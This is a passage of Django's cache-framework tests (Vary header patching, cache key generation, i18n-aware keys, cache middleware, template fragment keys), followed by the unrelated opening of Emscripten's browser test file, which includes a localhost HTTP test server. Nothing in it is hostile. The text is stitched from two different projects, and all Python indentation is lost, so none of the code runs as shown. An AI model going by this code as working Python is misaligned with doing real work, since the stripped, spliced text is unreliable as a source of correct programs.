('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
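# e.g. 'Hora estándar de Argentina' becomes 'Hora_estndar_de_Argentina'
# (non-ASCII characters dropped, spaces replaced); see
# test_cache_key_with_non_ascii_tzname below.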
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non-empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change the language again
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the language again
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor correctly distinguishes between CacheMiddleware used
as middleware and CacheMiddleware used as a view decorator, and sets its
attributes appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against the values defined in the override_settings above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
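# For comparison, the decorator path exercised here roughly corresponds to
# applying cache_page(60, cache='other', key_prefix='foo') to a view, as
# test_view_decorator below does with different values.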
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers with TemplateResponse.
Most are probably redundant since they manipulate the same object anyway,
but the ETag header is 'special' because it relies on the content being
complete (which is not necessarily always the case with a TemplateResponse).
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
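# The trailing hash is the MD5 of an empty string, since no vary_on values
# were provided.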
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
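# Each thread appended its own caches['default'] lookup; because connections
# are stored per thread, the two instances must differ.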
self.assertIsNot(c[0], c[1])
# test_browser.py
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_fastcomp, no_wasm_backend, create_test_file, parameterized
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
if sys.version_info.major == 2:
from urllib import urlopen
else:
from urllib.request import urlopen
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
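# Note: the defaults above are evaluated once, when this handler class is
# defined, so length defaults to the full payload size; extra is only
# iterated (never mutated), so the shared [] default is harmless here.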
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
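# Parse a byte-range request, e.g. "Range: bytes=0-1023" gives start=0 and
# end=1023; end is clamped to the payload size below.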
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test verifies behavior that will be deprecated at some point in the future; remove it once
# system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
@no_wasm_backend('wasm source maps')
def test_emscripten_log(self):
# TODO: wasm support for source maps. emscripten_loadSourceMap looks at $HTML.map but it should be $NAME.wasm.map.
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest([src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
run_process(['doit.bat'])
else:
run_process(['sh', './doit.sh'])
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
